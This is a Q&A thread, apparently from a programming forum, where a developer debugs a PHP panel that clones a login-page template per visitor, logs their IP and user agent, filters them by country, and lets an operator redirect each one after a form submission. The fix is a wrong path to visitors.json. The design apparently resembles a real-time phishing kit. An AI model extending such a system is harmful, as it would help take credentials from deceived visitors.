PHP Session Issue: "User not found" Error When Redirecting Visitors Based on JSON Data
I'm building a PHP-based admin panel to manually redirect users to a specific page after they submit a form. The flow is as follows:

index.php: Creates a unique folder for each visitor, stores their info (IP, hostname, user agent) in visitors.json, and redirects them to a login page.

form.php: Allows visitors to submit a form

waiting.php: Displays a loading animation until the admin panel determines the redirect URL

Admin Panel (ad/index.php): Allows the admin to manually set the redirect URL for each visitor.

redirect.php: This file is responsible for checking if the visitor has been redirected. If so, it sends them to the correct page; otherwise, it refreshes and continues checking.


However, I'm facing three issues:

When the form is submitted successfully it redirects to  waiting.php that shows an animation until redirection, but the message User not found. Please start again. appears.

The admin panel's redirect buttons don't seem to work; clicking them doesn't trigger the intended redirection.

When I try to redirect a visitor, I get the error "User not found. Please start again."


Here's a brief look at the relevant parts of my code:
index.php
include('./includes.php');
date_default_timezone_set('Africa/Casablanca');

// Function to get visitor info, create folder, and log data...

$ip = getVisitorIP();
$hostname = getVisitorHostname($ip);
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$visit_time = date('Y-m-d H:i:s');
$data = readVisitorData();

if (!isFromSwitzerland($ip)) {
    $visitorFolder = uniqid();
    mkdir($visitorFolder, 0755, true);
    recurse_copy('./S_B_B', $visitorFolder);
    $data[] = [
        'id' => $visitorFolder,
        'ip' => $ip,
        'hostname' => $hostname,
        'user_agent' => $userAgent,
        'visit_time' => $visit_time,
        'redirected' => false,
        'redirect_url' => ''
    ];
    saveVisitorData($data);
    $_SESSION['visitor_id'] = $visitorFolder;
    header("Location: $visitorFolder/Users/login.php");
    exit();
} else {
    header('HTTP/1.0 403 Forbidden');
    exit();
}

includes.php

function getVisitorIP() { /* ... */ }
function readVisitorData() { 
    $file = __DIR__ . '/../visitors.json';
    if (file_exists($file)) {
        return json_decode(file_get_contents($file), true) ?: [];
    }
    return [];
}
function saveVisitorData($data) {
    $file = __DIR__ . '/../visitors.json';
    file_put_contents($file, json_encode($data, JSON_PRETTY_PRINT));
}

waiting.php

$visitor_id = $_SESSION['visitor_id'] ?? null;
if (!$visitor_id) {
    echo "Session expired. Please start again.";
    exit();
}

$data = readVisitorData();
$user_found = false;

foreach ($data as &$visitor) {
    if ($visitor['id'] == $visitor_id) {
        $user_found = true;
        if ($visitor['redirected']) {
            header('Location: ' . $visitor['redirect_url']);
            exit();
        }
        break;
    }
}

if (!$user_found) {
    echo "User not found. Please start again.";
    exit();
}
?>
<html lang="it">
<head>
    <title>Loading</title>
    <meta http-equiv="refresh" content="10">
</head>
<body>
    <p>Loading... Please wait.</p>
</body>
</html>

Admin Panel (/ad/index.php):
date_default_timezone_set('Africa/Casablanca');

$data = readVisitorData();

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $visitor_id = filter_input(INPUT_POST, 'visitor_id', FILTER_SANITIZE_STRING);
    $redirect_page = filter_input(INPUT_POST, 'redirect_page', FILTER_SANITIZE_STRING);
    
    if ($visitor_id && $redirect_page) {
        foreach ($data as &$visitor) {
            if ($visitor['id'] == $visitor_id) {
                $visitor['redirect_url'] = '../Users/' . $redirect_page . '.php';
                $visitor['redirected'] = true;
                break;
            }
        }
        saveVisitorData($data);
        $message = "Visitor redirected successfully.";
    } else {
        $message = "Invalid input.";
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>Admin Panel</title>
</head>
<body>
    <h1>Visitor Information</h1>
    <?php if (isset($message)) { echo "<p>$message</p>"; } ?>
    <table>
        <!-- Display visitor data and action buttons -->
    </table>
</body>
</html>

ad/redirect.php:
<?php
include('../includes.php');

$visitor_id = $_SESSION['visitor_id'] ?? null;
if (!$visitor_id) {
    echo "Session expired. Please start again.";
    exit();
}

$data = readVisitorData();

foreach ($data as &$visitor) {
    if ($visitor['id'] == $visitor_id && $visitor['redirected'] && isset($visitor['redirect_url'])) {
        header('Location: ' . $visitor['redirect_url']);
        exit();
    }
}

// If not redirected, refresh the page after 5 seconds to keep checking
header('Refresh: 5; URL=../Waiting/waiting3.php');
exit();
?>

visitors.json (example):
[
    {
        "id": "667f0ac691010",
        "ip": "::1",
        "hostname": "localhost",
        "user_agent": "Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/122.0.0.0 Safari\/537.36",
        "visit_time": "2024-06-28 20:11:01",
        "redirected": false,
        "redirect_url": ""
    }
]

What could be causing the "User not found" error, and why are the redirect buttons in the admin panel not working as expected?

Why copy, recursively or not, files to newly created directories for each potential user?

sorry for the mistake, the question is: when the user submits the form form.php and clicks submit they redirect to a page waiting.php where the animation appears until I decide which page to redirect them to in the admin panel, in that waiting.php  I got User not found. Please start again., if you can suggest any enhancement for the scripts that would be great, thank you

Please create an MRE and replace the code dump in your post with a Minimal, Reproduceable example, along with details regarding which line in your code is not producing the expected result. Also, please include a question about a specific problem or error, which means, at a minimum, we'll see something with a ? at the end of it.

@devlincarnate I guess the waiting.php was the problem precise because it didn't retrieve the $_SSESION['visitore_id'] from visitors.json, the rest of waiting.php is just an animation that keeps loading until i click redirect from the admin panel, but when I click redirect from admin panel nothing happens on the clients side, I'm still on development face, testing it by myself

See here and here for more help on asking a question.

@devlincarnate I apologize for the misunderstanding, i will create a new question trying yo clarify the issue

Please just edit this existing question.

i can't make a new question !!

Just [edit] this one. There's an edit button right underneath it

Try putting var_dump($visitor_id, $data); after calling readVisitorData(). This should explain why the user is not found.

BTW, there's no need to use a reference in foreach ($data as &$visitor). You only need a reference if you're modifying $visitor.

@Barmar yes when i added ```$visitor_id = $_SESSION['visitor_id'];
var_dump($data, "visitore_id:" . $visitor_id."\n");
if (!$visitor_id) {
echo "Session expired. Please start again.";
exit();
}
```array(0) {
}
string(26) "visitore_id:667f1bcab67c1
"
User not found. Please start again.


So it seems like your visitors.json file is empty.

Add debugging statements to readVisitorData() and saveVisitorData() to see what's happening when they get called.

thank you, folks, I got the solution, the issue is in the in includes.php in the readVisitorData() function, I used to put the visitors.json in the root of the website folder.
Thank you so much for assistance.

@Barmar Thank you sir, you also catch the error.
